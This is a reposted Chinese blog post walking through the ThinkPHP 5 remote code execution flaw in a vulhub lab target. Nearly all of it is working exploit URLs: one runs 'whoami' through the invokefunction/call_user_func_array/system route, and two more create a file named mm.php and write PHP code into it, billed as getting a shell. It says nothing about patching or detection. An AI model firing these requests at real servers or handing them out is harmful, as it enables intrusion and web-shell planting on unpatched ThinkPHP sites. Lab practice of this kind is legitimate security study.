overfit同步小助手

2023-08-07 23:08:02

thinkphp 5-rce（rce漏洞getshell）

vulhub靶场

http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

验证漏洞

linux系统，可以用touch命令创建文件

http://xxxxx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=**touch mm.php**

再用echo写入一句话

http://xxxxx:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=**echo <?php phpinfo();?> >> mm.php**

查看写入成功

标签：安全 web安全 php

本文转载自: https://blog.csdn.net/weixin_51692662/article/details/127673160
版权归原作者 安全~小菜鸡 所有，如有侵权，请联系我们删除。

发表评论

登录后发布评论

“thinkphp 5-rce（rce漏洞getshell）”的评论:

还没有评论

关于作者

overfit同步小助手

文章同步

相关阅读

【安全科普】NUMA防火墙诞生记

ubuntu离线安装docker及nvidia-container-toolkit

【若依】postman调试出现认证失败，无法访问系统资源

全面的远程定位功能测试工具V1.0.1

【Linux】vim的使用

【Kafka 实战】如何解决Kafka Topic数量过多带来的性能问题？

Edge 上启用配置和管理 IE 模式IE Mode

文章导航